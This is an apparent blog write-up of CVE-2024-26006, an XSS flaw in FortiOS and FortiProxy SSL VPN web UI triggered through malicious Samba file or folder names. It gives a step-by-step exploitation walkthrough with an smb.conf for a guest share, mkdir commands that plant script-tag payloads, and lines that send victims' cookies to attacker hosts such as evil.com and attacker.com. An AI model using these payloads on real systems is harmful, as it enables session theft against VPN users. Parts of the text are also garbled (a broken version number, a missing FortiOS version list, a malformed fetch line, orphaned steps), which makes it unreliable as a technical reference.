CVE-2024-26006 - Understanding and Exploiting Cross-Site Scripting in FortiOS and FortiProxy SSL VPN

In early 2024, security researchers discovered a serious vulnerability identified as CVE-2024-26006 affecting Fortinet's FortiOS and FortiProxy SSL VPN web UI. This "improper neutralization of input during web page generation (CWE-79)"—more commonly known as a Cross-Site Scripting (XSS) vulnerability—could let a remote, unauthenticated attacker run scripts in the browsers of users who visit the SSL VPN web interface.

This article takes you through the roots of the issue, demonstrates how an attacker can abuse it, and offers practical code examples and mitigation advice.

Vulnerability Details

CVE-ID: CVE-2024-26006

FortiProxy: 7.4.3 and below, 7.2.9 and below, 7..16 and below

Description:
The SSL VPN web UI in these FortiOS and FortiProxy versions does not properly sanitize input received from external Samba servers. If an attacker can control (or trick the FortiGate or FortiProxy into connecting to) a malicious Samba server, they can inject JavaScript which will get executed in the context of the VPN admin/user session. This means a remote, unauthenticated attacker could perform XSS without logging in or having internal access to your network.

They don’t even need to authenticate: anonymous exploitation is possible

With so many organizations using VPNs for remote work, this bug has real potential to compromise sensitive networks.

How XSS Works Here

The web SSL VPN UI allows browsing to SMB/Samba file shares. When parsing server responses (like file names, messages, etc.), the UI fails to properly sanitize or encode untrusted input. If any value contains HTML or JavaScript, it may get rendered directly—creating an XSS hole.

1. Set Up a Malicious Samba Server

The attacker hosts a Samba server and crafts a shared file/folder or message whose name contains JavaScript—like:

"><script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>

2. Trick the VPN Appliance to Access the Malicious Server

The attacker gets an admin or user to connect to their server through the web SSL VPN UI. This might involve:

Social engineering ("Please connect to our new file share at evil.com" over email)

- Or, open share breaches/automated scanning (the Fortinet appliance browses available shares)

### 3. User/Administrator Browses the Malicious Share

As soon as a user/admin visits the SMB share listing, the vulnerable Fortinet web UI displays the crafted name, executing the attacker’s script. For example, the attacker’s injected code could exfiltrate cookies or perform actions as the victim.

Samba config (smb.conf)

[evilshare]
    path = /srv/samba/evilshare
    read only = no
    guest ok = yes

Now, create a directory or file with an XSS payload as its name

mkdir "/srv/samba/evilshare/\"><script src='http://attacker.com/capture.js'></script>";

Or from Windows

mkdir "\\YOUR_ATTACKER_SERVER\evilshare\"><script>alert('XSS')</script>"

When the VPN UI attempts to display this file/folder, the <script> tag executes.

Expected Result

- If the SSL VPN UI runs under a privileged account (admin, etc), the attacker's payload can access or steal the victim’s information, including credentials.

Attacker runs Samba with evil file name

2. Victim (admin/user) logs in to SSL VPN, browses the SMB share

Malicious JavaScript runs in the browser, e.g.

// In attacker.js, hosted on attacker-controlled server
fetch('https://attacker.com/collect?c='; + encodeURIComponent(document.cookie))

Result: The victim’s session token/cookie is sent to the attacker.

Fortinet has released patched versions.

See Fortinet’s advisory for the latest updates.

More Reading

- CVE-2024-26006 NIST Entry
- Fortinet advisory (FG-IR-24-025)
- What is Cross-Site Scripting (OWASP)

Conclusion

CVE-2024-26006 shows how a web UI feature designed for convenience can turn into a security disaster if user input—especially from sources like network file shares—isn’t thoroughly sanitized. Attackers need only trick a user into clicking a link or visiting a share, and with no login needed, this XSS is particularly dangerous.

Patch your systems, disable unnecessary SMB browsing, and train users to be alert for phishing or odd file shares.

*If you need further technical details or want to test your environment, be sure to use an offline, non-production setup—xss vulnerabilities can expose sensitive data instantly.*


_This original analysis aims to make the risks and mechanics of CVE-2024-26006 clear to everyone, from sysadmins to security pros._

Timeline

Published on: 03/14/2025 10:15:14 UTC